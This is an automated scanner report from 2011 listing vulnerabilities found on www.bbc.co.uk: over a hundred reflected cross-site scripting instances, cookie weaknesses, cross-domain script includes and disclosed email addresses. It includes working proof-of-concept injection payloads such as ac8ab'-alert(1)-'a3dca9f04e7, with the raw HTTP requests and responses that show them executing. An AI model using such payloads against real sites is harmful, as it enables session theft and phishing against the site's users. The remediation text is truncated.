XSS, Cross Site Scripting, www.bbc.co.uk, CWE-79, DORK

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by CloudScan Vulnerability Crawler at Mon Feb 14 11:06:28 CST 2011.


The DORK Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.bbc.co.uk/go/rss/int/news/-/news/ [name of an arbitrarily supplied request parameter]

1.2. http://www.bbc.co.uk/go/rss/int/news/-/news/12437486 [name of an arbitrarily supplied request parameter]

1.3. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12427680 [name of an arbitrarily supplied request parameter]

1.4. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12428689 [name of an arbitrarily supplied request parameter]

1.5. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431066 [name of an arbitrarily supplied request parameter]

1.6. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431281 [name of an arbitrarily supplied request parameter]

1.7. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434447 [name of an arbitrarily supplied request parameter]

1.8. http://www.bbc.co.uk/news/business-12434447 [name of an arbitrarily supplied request parameter]

1.9. http://www.bbc.co.uk/news/business-12434453 [name of an arbitrarily supplied request parameter]

1.10. http://www.bbc.co.uk/news/business-12435838 [name of an arbitrarily supplied request parameter]

1.11. http://www.bbc.co.uk/news/business-12437194 [name of an arbitrarily supplied request parameter]

1.12. http://www.bbc.co.uk/news/education-12429152 [name of an arbitrarily supplied request parameter]

1.13. http://www.bbc.co.uk/news/entertainment-arts-12426999 [name of an arbitrarily supplied request parameter]

1.14. http://www.bbc.co.uk/news/entertainment-arts-12427905 [name of an arbitrarily supplied request parameter]

1.15. http://www.bbc.co.uk/news/entertainment-arts-12428196 [name of an arbitrarily supplied request parameter]

1.16. http://www.bbc.co.uk/news/health-12401970 [name of an arbitrarily supplied request parameter]

1.17. http://www.bbc.co.uk/news/health-12409700 [name of an arbitrarily supplied request parameter]

1.18. http://www.bbc.co.uk/news/health-12415801 [name of an arbitrarily supplied request parameter]

1.19. http://www.bbc.co.uk/news/magazine-12392811 [name of an arbitrarily supplied request parameter]

1.20. http://www.bbc.co.uk/news/magazine-12418046 [name of an arbitrarily supplied request parameter]

1.21. http://www.bbc.co.uk/news/magazine-12428754 [name of an arbitrarily supplied request parameter]

1.22. http://www.bbc.co.uk/news/magazine-12428759 [name of an arbitrarily supplied request parameter]

1.23. http://www.bbc.co.uk/news/science-environment-12412662 [name of an arbitrarily supplied request parameter]

1.24. http://www.bbc.co.uk/news/science-environment-12417858 [name of an arbitrarily supplied request parameter]

1.25. http://www.bbc.co.uk/news/science-environment-12424620 [name of an arbitrarily supplied request parameter]

1.26. http://www.bbc.co.uk/news/technology-12419672 [name of an arbitrarily supplied request parameter]

1.27. http://www.bbc.co.uk/news/technology-12429808 [name of an arbitrarily supplied request parameter]

1.28. http://www.bbc.co.uk/news/uk-12427839 [name of an arbitrarily supplied request parameter]

1.29. http://www.bbc.co.uk/news/uk-12437244 [name of an arbitrarily supplied request parameter]

1.30. http://www.bbc.co.uk/news/uk-england-london-12438040 [name of an arbitrarily supplied request parameter]

1.31. http://www.bbc.co.uk/news/uk-northern-ireland-12427112 [name of an arbitrarily supplied request parameter]

1.32. http://www.bbc.co.uk/news/uk-northern-ireland-12428837 [name of an arbitrarily supplied request parameter]

1.33. http://www.bbc.co.uk/news/uk-politics-12428814 [name of an arbitrarily supplied request parameter]

1.34. http://www.bbc.co.uk/news/uk-scotland-12433015 [name of an arbitrarily supplied request parameter]

1.35. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192 [name of an arbitrarily supplied request parameter]

1.36. http://www.bbc.co.uk/news/uk-wales-12427865 [name of an arbitrarily supplied request parameter]

1.37. http://www.bbc.co.uk/news/uk-wales-12433322 [name of an arbitrarily supplied request parameter]

1.38. http://www.bbc.co.uk/news/world-12428938 [name of an arbitrarily supplied request parameter]

1.39. http://www.bbc.co.uk/news/world-12434787 [name of an arbitrarily supplied request parameter]

1.40. http://www.bbc.co.uk/news/world-africa-12427390 [name of an arbitrarily supplied request parameter]

1.41. http://www.bbc.co.uk/news/world-africa-12430115 [name of an arbitrarily supplied request parameter]

1.42. http://www.bbc.co.uk/news/world-africa-12432292 [name of an arbitrarily supplied request parameter]

1.43. http://www.bbc.co.uk/news/world-africa-12433674 [name of an arbitrarily supplied request parameter]

1.44. http://www.bbc.co.uk/news/world-asia-pacific-12427423 [name of an arbitrarily supplied request parameter]

1.45. http://www.bbc.co.uk/news/world-asia-pacific-12428385 [name of an arbitrarily supplied request parameter]

1.46. http://www.bbc.co.uk/news/world-asia-pacific-12430671 [name of an arbitrarily supplied request parameter]

1.47. http://www.bbc.co.uk/news/world-middle-east-12435798 [name of an arbitrarily supplied request parameter]

1.48. http://www.bbc.co.uk/news/world-middle-east-12437440 [name of an arbitrarily supplied request parameter]

1.49. http://www.bbc.co.uk/news/world-middle-east-12437881 [name of an arbitrarily supplied request parameter]

1.50. http://www.bbc.co.uk/news/world-middle-east-12437912 [name of an arbitrarily supplied request parameter]

1.51. http://www.bbc.co.uk/news/world-middle-east-12437922 [name of an arbitrarily supplied request parameter]

1.52. http://www.bbc.co.uk/news/world-south-asia-12427513 [name of an arbitrarily supplied request parameter]

1.53. http://www.bbc.co.uk/news/world-south-asia-12427518 [name of an arbitrarily supplied request parameter]

1.54. http://www.bbc.co.uk/news/world-south-asia-12437087 [name of an arbitrarily supplied request parameter]

1.55. http://www.bbc.co.uk/news/world-us-canada-12411274 [name of an arbitrarily supplied request parameter]

1.56. http://www.bbc.co.uk/news/world-us-canada-12435117 [name of an arbitrarily supplied request parameter]

1.57. http://www.bbc.co.uk/news/world-us-canada-12436383 [name of an arbitrarily supplied request parameter]

1.58. http://www.bbc.co.uk/news/world-us-canada-12437116 [name of an arbitrarily supplied request parameter]

1.59. http://www.bbc.co.uk/news/world-us-canada-12437121 [name of an arbitrarily supplied request parameter]

1.60. http://www.bbc.co.uk/news/business-12434447 [Referer HTTP header]

1.61. http://www.bbc.co.uk/news/business-12434453 [Referer HTTP header]

1.62. http://www.bbc.co.uk/news/business-12435838 [Referer HTTP header]

1.63. http://www.bbc.co.uk/news/business-12437194 [Referer HTTP header]

1.64. http://www.bbc.co.uk/news/education-12429152 [Referer HTTP header]

1.65. http://www.bbc.co.uk/news/entertainment-arts-12426999 [Referer HTTP header]

1.66. http://www.bbc.co.uk/news/entertainment-arts-12427905 [Referer HTTP header]

1.67. http://www.bbc.co.uk/news/entertainment-arts-12428196 [Referer HTTP header]

1.68. http://www.bbc.co.uk/news/health-12401970 [Referer HTTP header]

1.69. http://www.bbc.co.uk/news/health-12409700 [Referer HTTP header]

1.70. http://www.bbc.co.uk/news/health-12415801 [Referer HTTP header]

1.71. http://www.bbc.co.uk/news/magazine-12392811 [Referer HTTP header]

1.72. http://www.bbc.co.uk/news/magazine-12418046 [Referer HTTP header]

1.73. http://www.bbc.co.uk/news/magazine-12428754 [Referer HTTP header]

1.74. http://www.bbc.co.uk/news/magazine-12428759 [Referer HTTP header]

1.75. http://www.bbc.co.uk/news/science-environment-12412662 [Referer HTTP header]

1.76. http://www.bbc.co.uk/news/science-environment-12417858 [Referer HTTP header]

1.77. http://www.bbc.co.uk/news/science-environment-12424620 [Referer HTTP header]

1.78. http://www.bbc.co.uk/news/technology-12419672 [Referer HTTP header]

1.79. http://www.bbc.co.uk/news/technology-12429808 [Referer HTTP header]

1.80. http://www.bbc.co.uk/news/uk-12427839 [Referer HTTP header]

1.81. http://www.bbc.co.uk/news/uk-12437244 [Referer HTTP header]

1.82. http://www.bbc.co.uk/news/uk-england-london-12438040 [Referer HTTP header]

1.83. http://www.bbc.co.uk/news/uk-northern-ireland-12427112 [Referer HTTP header]

1.84. http://www.bbc.co.uk/news/uk-northern-ireland-12428837 [Referer HTTP header]

1.85. http://www.bbc.co.uk/news/uk-politics-12428814 [Referer HTTP header]

1.86. http://www.bbc.co.uk/news/uk-scotland-12433015 [Referer HTTP header]

1.87. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192 [Referer HTTP header]

1.88. http://www.bbc.co.uk/news/uk-wales-12427865 [Referer HTTP header]

1.89. http://www.bbc.co.uk/news/uk-wales-12433322 [Referer HTTP header]

1.90. http://www.bbc.co.uk/news/world-12428938 [Referer HTTP header]

1.91. http://www.bbc.co.uk/news/world-middle-east-12435798 [Referer HTTP header]

1.92. http://www.bbc.co.uk/news/world-middle-east-12437440 [Referer HTTP header]

1.93. http://www.bbc.co.uk/news/world-middle-east-12437881 [Referer HTTP header]

1.94. http://www.bbc.co.uk/news/world-middle-east-12437912 [Referer HTTP header]

1.95. http://www.bbc.co.uk/news/world-middle-east-12437922 [Referer HTTP header]

1.96. http://www.bbc.co.uk/news/world-south-asia-12427513 [Referer HTTP header]

1.97. http://www.bbc.co.uk/news/world-south-asia-12427518 [Referer HTTP header]

1.98. http://www.bbc.co.uk/news/world-south-asia-12437087 [Referer HTTP header]

1.99. http://www.bbc.co.uk/news/world-us-canada-12411274 [Referer HTTP header]

1.100. http://www.bbc.co.uk/news/world-us-canada-12435117 [Referer HTTP header]

1.101. http://www.bbc.co.uk/news/world-us-canada-12436383 [Referer HTTP header]

1.102. http://www.bbc.co.uk/news/world-us-canada-12437116 [Referer HTTP header]

1.103. http://www.bbc.co.uk/news/world-us-canada-12437121 [Referer HTTP header]

2. Cookie scoped to parent domain

2.1. http://www.bbc.co.uk/go/rss/int/news/-/news/

2.2. http://www.bbc.co.uk/go/rss/int/news/-/news/12437486

2.3. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12427680

2.4. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12428689

2.5. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431066

2.6. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431281

2.7. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434447

2.8. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434453

2.9. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12435838

2.10. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12437194

2.11. http://www.bbc.co.uk/go/rss/int/news/-/news/education-12429152

2.12. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12426999

2.13. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12427905

2.14. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12428196

2.15. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12401970

2.16. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12409700

2.17. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12415801

2.18. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12392811

2.19. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12418046

2.20. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12428754

2.21. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12428759

2.22. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12412662

2.23. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12417858

2.24. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12424620

2.25. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12433758

2.26. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435274

2.27. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435550

2.28. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435798

2.29. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437440

2.30. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437881

2.31. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437912

2.32. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437922

2.33. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12427513

2.34. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12427518

2.35. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12437087

2.36. http://www.bbc.co.uk/go/rss/int/news/-/news/world-us-canada-12411274

2.37. http://www.bbc.co.uk/news/business-12434447

2.38. http://www.bbc.co.uk/news/business-12434453

2.39. http://www.bbc.co.uk/news/business-12435838

2.40. http://www.bbc.co.uk/news/business-12437194

2.41. http://www.bbc.co.uk/news/education-12429152

2.42. http://www.bbc.co.uk/news/entertainment-arts-12426999

2.43. http://www.bbc.co.uk/news/entertainment-arts-12427905

2.44. http://www.bbc.co.uk/news/entertainment-arts-12428196

2.45. http://www.bbc.co.uk/news/health-12401970

2.46. http://www.bbc.co.uk/news/health-12409700

2.47. http://www.bbc.co.uk/news/health-12415801

2.48. http://www.bbc.co.uk/news/magazine-12392811

2.49. http://www.bbc.co.uk/news/magazine-12418046

2.50. http://www.bbc.co.uk/news/magazine-12428754

2.51. http://www.bbc.co.uk/news/magazine-12428759

2.52. http://www.bbc.co.uk/news/science-environment-12412662

2.53. http://www.bbc.co.uk/news/science-environment-12417858

2.54. http://www.bbc.co.uk/news/science-environment-12424620

2.55. http://www.bbc.co.uk/news/technology-12419672

2.56. http://www.bbc.co.uk/news/technology-12429808

2.57. http://www.bbc.co.uk/news/uk-12427839

2.58. http://www.bbc.co.uk/news/uk-12435618

2.59. http://www.bbc.co.uk/news/uk-12437244

2.60. http://www.bbc.co.uk/news/uk-england-london-12438040

2.61. http://www.bbc.co.uk/news/uk-northern-ireland-12427112

2.62. http://www.bbc.co.uk/news/uk-northern-ireland-12428837

2.63. http://www.bbc.co.uk/news/uk-politics-12428814

2.64. http://www.bbc.co.uk/news/uk-scotland-12433015

2.65. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192

2.66. http://www.bbc.co.uk/news/uk-wales-12427865

2.67. http://www.bbc.co.uk/news/uk-wales-12433322

2.68. http://www.bbc.co.uk/news/world-12428938

2.69. http://www.bbc.co.uk/news/world-12434787

2.70. http://www.bbc.co.uk/news/world-africa-12427390

2.71. http://www.bbc.co.uk/news/world-africa-12430115

2.72. http://www.bbc.co.uk/news/world-africa-12432292

2.73. http://www.bbc.co.uk/news/world-africa-12433674

2.74. http://www.bbc.co.uk/news/world-asia-pacific-12427423

2.75. http://www.bbc.co.uk/news/world-asia-pacific-12428385

2.76. http://www.bbc.co.uk/news/world-asia-pacific-12430671

2.77. http://www.bbc.co.uk/news/world-europe-12429539

2.78. http://www.bbc.co.uk/news/world-europe-12432879

2.79. http://www.bbc.co.uk/news/world-latin-america-12427051

2.80. http://www.bbc.co.uk/news/world-latin-america-12427057

2.81. http://www.bbc.co.uk/news/world-latin-america-12436213

2.82. http://www.bbc.co.uk/news/world-middle-east-12435798

2.83. http://www.bbc.co.uk/news/world-middle-east-12437440

2.84. http://www.bbc.co.uk/news/world-middle-east-12437881

2.85. http://www.bbc.co.uk/news/world-middle-east-12437912

2.86. http://www.bbc.co.uk/news/world-middle-east-12437922

2.87. http://www.bbc.co.uk/news/world-south-asia-12427513

2.88. http://www.bbc.co.uk/news/world-south-asia-12427518

2.89. http://www.bbc.co.uk/news/world-south-asia-12437087

2.90. http://www.bbc.co.uk/news/world-us-canada-12411274

2.91. http://www.bbc.co.uk/news/world-us-canada-12435117

2.92. http://www.bbc.co.uk/news/world-us-canada-12436383

2.93. http://www.bbc.co.uk/news/world-us-canada-12437116

2.94. http://www.bbc.co.uk/news/world-us-canada-12437121

3. Cross-domain script include

3.1. http://www.bbc.co.uk/news/business-12434447

3.2. http://www.bbc.co.uk/news/business-12434453

3.3. http://www.bbc.co.uk/news/business-12435838

3.4. http://www.bbc.co.uk/news/business-12437194

3.5. http://www.bbc.co.uk/news/education-12429152

3.6. http://www.bbc.co.uk/news/entertainment-arts-12426999

3.7. http://www.bbc.co.uk/news/entertainment-arts-12427905

3.8. http://www.bbc.co.uk/news/entertainment-arts-12428196

3.9. http://www.bbc.co.uk/news/health-12401970

3.10. http://www.bbc.co.uk/news/health-12409700

3.11. http://www.bbc.co.uk/news/health-12415801

3.12. http://www.bbc.co.uk/news/magazine-12392811

3.13. http://www.bbc.co.uk/news/magazine-12418046

3.14. http://www.bbc.co.uk/news/magazine-12428754

3.15. http://www.bbc.co.uk/news/magazine-12428759

3.16. http://www.bbc.co.uk/news/science-environment-12412662

3.17. http://www.bbc.co.uk/news/science-environment-12417858

3.18. http://www.bbc.co.uk/news/science-environment-12424620

3.19. http://www.bbc.co.uk/news/technology-12419672

3.20. http://www.bbc.co.uk/news/technology-12429808

3.21. http://www.bbc.co.uk/news/uk-12427839

3.22. http://www.bbc.co.uk/news/uk-12435618

3.23. http://www.bbc.co.uk/news/uk-12437244

3.24. http://www.bbc.co.uk/news/uk-england-london-12438040

3.25. http://www.bbc.co.uk/news/uk-northern-ireland-12427112

3.26. http://www.bbc.co.uk/news/uk-northern-ireland-12428837

3.27. http://www.bbc.co.uk/news/uk-politics-12428814

3.28. http://www.bbc.co.uk/news/uk-scotland-12433015

3.29. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192

3.30. http://www.bbc.co.uk/news/uk-wales-12427865

3.31. http://www.bbc.co.uk/news/uk-wales-12433322

3.32. http://www.bbc.co.uk/news/world-12428938

3.33. http://www.bbc.co.uk/news/world-12434787

3.34. http://www.bbc.co.uk/news/world-africa-12427390

3.35. http://www.bbc.co.uk/news/world-africa-12430115

3.36. http://www.bbc.co.uk/news/world-africa-12432292

3.37. http://www.bbc.co.uk/news/world-africa-12433674

3.38. http://www.bbc.co.uk/news/world-asia-pacific-12427423

3.39. http://www.bbc.co.uk/news/world-asia-pacific-12428385

3.40. http://www.bbc.co.uk/news/world-asia-pacific-12430671

3.41. http://www.bbc.co.uk/news/world-europe-12429539

3.42. http://www.bbc.co.uk/news/world-europe-12432879

3.43. http://www.bbc.co.uk/news/world-latin-america-12427051

3.44. http://www.bbc.co.uk/news/world-latin-america-12427057

3.45. http://www.bbc.co.uk/news/world-latin-america-12436213

3.46. http://www.bbc.co.uk/news/world-middle-east-12435798

3.47. http://www.bbc.co.uk/news/world-middle-east-12437440

3.48. http://www.bbc.co.uk/news/world-middle-east-12437881

3.49. http://www.bbc.co.uk/news/world-middle-east-12437912

3.50. http://www.bbc.co.uk/news/world-middle-east-12437922

3.51. http://www.bbc.co.uk/news/world-south-asia-12427513

3.52. http://www.bbc.co.uk/news/world-south-asia-12427518

3.53. http://www.bbc.co.uk/news/world-south-asia-12437087

3.54. http://www.bbc.co.uk/news/world-us-canada-12411274

3.55. http://www.bbc.co.uk/news/world-us-canada-12435117

3.56. http://www.bbc.co.uk/news/world-us-canada-12436383

3.57. http://www.bbc.co.uk/news/world-us-canada-12437116

3.58. http://www.bbc.co.uk/news/world-us-canada-12437121

4. Cookie without HttpOnly flag set

4.1. http://www.bbc.co.uk/go/rss/int/news/-/news/

4.2. http://www.bbc.co.uk/go/rss/int/news/-/news/12437486

4.3. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12427680

4.4. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12428689

4.5. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431066

4.6. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431281

4.7. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434447

4.8. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434453

4.9. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12435838

4.10. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12437194

4.11. http://www.bbc.co.uk/go/rss/int/news/-/news/education-12429152

4.12. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12426999

4.13. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12427905

4.14. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12428196

4.15. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12401970

4.16. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12409700

4.17. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12415801

4.18. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12392811

4.19. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12418046

4.20. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12428754

4.21. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12428759

4.22. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12412662

4.23. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12417858

4.24. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12424620

4.25. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12433758

4.26. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435274

4.27. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435550

4.28. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12435798

4.29. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437440

4.30. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437881

4.31. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437912

4.32. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12437922

4.33. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12427513

4.34. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12427518

4.35. http://www.bbc.co.uk/go/rss/int/news/-/news/world-south-asia-12437087

4.36. http://www.bbc.co.uk/go/rss/int/news/-/news/world-us-canada-12411274

4.37. http://www.bbc.co.uk/news/business-12434447

4.38. http://www.bbc.co.uk/news/business-12434453

4.39. http://www.bbc.co.uk/news/business-12435838

4.40. http://www.bbc.co.uk/news/business-12437194

4.41. http://www.bbc.co.uk/news/education-12429152

4.42. http://www.bbc.co.uk/news/entertainment-arts-12426999

4.43. http://www.bbc.co.uk/news/entertainment-arts-12427905

4.44. http://www.bbc.co.uk/news/entertainment-arts-12428196

4.45. http://www.bbc.co.uk/news/health-12401970

4.46. http://www.bbc.co.uk/news/health-12409700

4.47. http://www.bbc.co.uk/news/health-12415801

4.48. http://www.bbc.co.uk/news/magazine-12392811

4.49. http://www.bbc.co.uk/news/magazine-12418046

4.50. http://www.bbc.co.uk/news/magazine-12428754

4.51. http://www.bbc.co.uk/news/magazine-12428759

4.52. http://www.bbc.co.uk/news/science-environment-12412662

4.53. http://www.bbc.co.uk/news/science-environment-12417858

4.54. http://www.bbc.co.uk/news/science-environment-12424620

4.55. http://www.bbc.co.uk/news/technology-12419672

4.56. http://www.bbc.co.uk/news/technology-12429808

4.57. http://www.bbc.co.uk/news/uk-12427839

4.58. http://www.bbc.co.uk/news/uk-12435618

4.59. http://www.bbc.co.uk/news/uk-12437244

4.60. http://www.bbc.co.uk/news/uk-england-london-12438040

4.61. http://www.bbc.co.uk/news/uk-northern-ireland-12427112

4.62. http://www.bbc.co.uk/news/uk-northern-ireland-12428837

4.63. http://www.bbc.co.uk/news/uk-politics-12428814

4.64. http://www.bbc.co.uk/news/uk-scotland-12433015

4.65. http://www.bbc.co.uk/news/uk-scotland-tayside-central-12433192

4.66. http://www.bbc.co.uk/news/uk-wales-12427865

4.67. http://www.bbc.co.uk/news/uk-wales-12433322

4.68. http://www.bbc.co.uk/news/world-12428938

4.69. http://www.bbc.co.uk/news/world-12434787

4.70. http://www.bbc.co.uk/news/world-africa-12427390

4.71. http://www.bbc.co.uk/news/world-africa-12430115

4.72. http://www.bbc.co.uk/news/world-africa-12432292

4.73. http://www.bbc.co.uk/news/world-africa-12433674

4.74. http://www.bbc.co.uk/news/world-asia-pacific-12427423

4.75. http://www.bbc.co.uk/news/world-asia-pacific-12428385

4.76. http://www.bbc.co.uk/news/world-asia-pacific-12430671

4.77. http://www.bbc.co.uk/news/world-europe-12429539

4.78. http://www.bbc.co.uk/news/world-europe-12432879

4.79. http://www.bbc.co.uk/news/world-latin-america-12427051

4.80. http://www.bbc.co.uk/news/world-latin-america-12427057

4.81. http://www.bbc.co.uk/news/world-latin-america-12436213

4.82. http://www.bbc.co.uk/news/world-middle-east-12435798

4.83. http://www.bbc.co.uk/news/world-middle-east-12437440

4.84. http://www.bbc.co.uk/news/world-middle-east-12437881

4.85. http://www.bbc.co.uk/news/world-middle-east-12437912

4.86. http://www.bbc.co.uk/news/world-middle-east-12437922

4.87. http://www.bbc.co.uk/news/world-south-asia-12427513

4.88. http://www.bbc.co.uk/news/world-south-asia-12427518

4.89. http://www.bbc.co.uk/news/world-south-asia-12437087

4.90. http://www.bbc.co.uk/news/world-us-canada-12411274

4.91. http://www.bbc.co.uk/news/world-us-canada-12435117

4.92. http://www.bbc.co.uk/news/world-us-canada-12436383

4.93. http://www.bbc.co.uk/news/world-us-canada-12437116

4.94. http://www.bbc.co.uk/news/world-us-canada-12437121

5. Email addresses disclosed

5.1. http://www.bbc.co.uk/news/science-environment-12412662

5.2. http://www.bbc.co.uk/news/world-middle-east-12435798



1. Cross-site scripting (reflected)  next
There are 103 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.bbc.co.uk/go/rss/int/news/-/news/ [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac8ab'-alert(1)-'a3dca9f04e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/?ac8ab'-alert(1)-'a3dca9f04e7=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=718
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=341da5b5ee6af47478cdc185b1979455565f170f3080722357ddfa9075431a7e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=341da5b5ee6af47478cdc185b1979455565f170f3080722357ddfa9075431a7e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 81881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476164000,
       editionToServe: 'us',
       queryString: 'ac8ab'-alert(1)-'a3dca9f04e7=1',
       referrer: null,
       section: 'front-page',
       sectionPath: '/Front page',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '10263779',
       assetType: 'index',
...[SNIP]...

1.2. http://www.bbc.co.uk/go/rss/int/news/-/news/12437486 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/12437486

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5432'-alert(1)-'c0f235c4feb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

